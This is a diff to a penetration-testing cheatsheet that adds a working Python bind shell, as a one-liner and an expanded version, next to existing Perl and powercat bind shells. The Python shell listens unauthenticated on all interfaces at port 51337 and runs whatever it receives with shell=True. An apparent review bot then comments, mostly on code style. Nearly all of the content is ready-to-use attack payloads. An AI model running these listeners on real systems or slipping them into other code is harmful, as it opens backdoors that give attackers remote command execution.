diff --git a/Methodology and Resources/Bind Shell Cheatsheet.md b/Methodology and Resources/Bind Shell Cheatsheet.md
index 73df69d..399c358 100644
--- a/Methodology and Resources/Bind Shell Cheatsheet.md
+++ b/Methodology and Resources/Bind Shell Cheatsheet.md
@@ -22,6 +22,30 @@ bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
 close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
 ```
 
+## Python
+
+Single line :
+```python
+python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
+```
+
+Expanded version :
+
+```python
+import socket as s,subprocess as sp;
+
+s1 = s.socket(s.AF_INET, s.SOCK_STREAM);
+s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1);
+s1.bind(("0.0.0.0", 51337));
+s1.listen(1);
+c, a = s1.accept();
+
+while True:
+    d = c.recv(1024).decode();
+    p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE);
+    c.sendall(p.stdout.read()+p.stderr.read())
+```
+
 ## PHP
 
 ```php
@@ -68,4 +92,4 @@ powercat -l -p 7002 -ep
 # Connect from attacker
 . .\powercat.ps1
 powercat -c 127.0.0.1 -p 7002
-```
\ No newline at end of file
+```
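Review bot: The "Expanded version" block keeps the one-liner's trailing semicolons on every statement (`import socket as s,subprocess as sp;`, `s1.listen(1);`, `d = c.recv(1024).decode();`), which are leftover noise once the code is laid out line by line; drop them and split the import into `import socket as s` / `import subprocess as sp` so the expanded listing reads as ordinary Python. The section also never states what the listing does: a comment at the top of the expanded block such as `# unauthenticated listener on all interfaces (0.0.0.0:51337); serves one accepted client, commands run via shell=True` would make the exposure obvious to anyone reading the cheatsheet or triaging a host where such a process is found. The address returned by `accept()` is never used, so `c, a = s1.accept()` can be written `c, _ = s1.accept()` to signal that intent. The second hunk only fixes the missing newline at end of file and needs nothing.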